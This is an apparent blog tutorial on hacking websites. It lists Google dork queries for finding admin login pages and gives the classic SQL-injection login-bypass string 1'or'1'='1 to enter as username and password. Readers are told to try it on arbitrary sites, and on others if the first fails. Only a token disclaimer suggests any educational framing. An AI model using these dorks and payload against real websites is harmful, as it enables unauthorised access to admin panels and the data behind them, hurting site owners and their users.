In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).I will show you how to get into a website by using some google dorks and SQL query. By using SQL queries we can bypass the username and password and can enter into the admin panel. To hack a website simply follow these steps :-
> Use any of the google dork to find the admin login page of a website.
inurl:admin.asp
inurl:admin.php
intitle:admin
intitle:admin login
intitle:administrator
inurl:adminlogin.asp inurl:adminlogin.php
inurl:administrator
There are many websites which can be hacked by this. Open anyone and you will see the login page. Type this SQL query in form.
Username : 1'or'1'='1
Password : 1'or'1'='1
Note : This is only for educational purposes. I am not responsible for any damage done by anyone.
If the site is vulnerable to this you will get into the admin panel. If it dont work then try other sites.
0 comments:
Confused?Feel Free to Ask!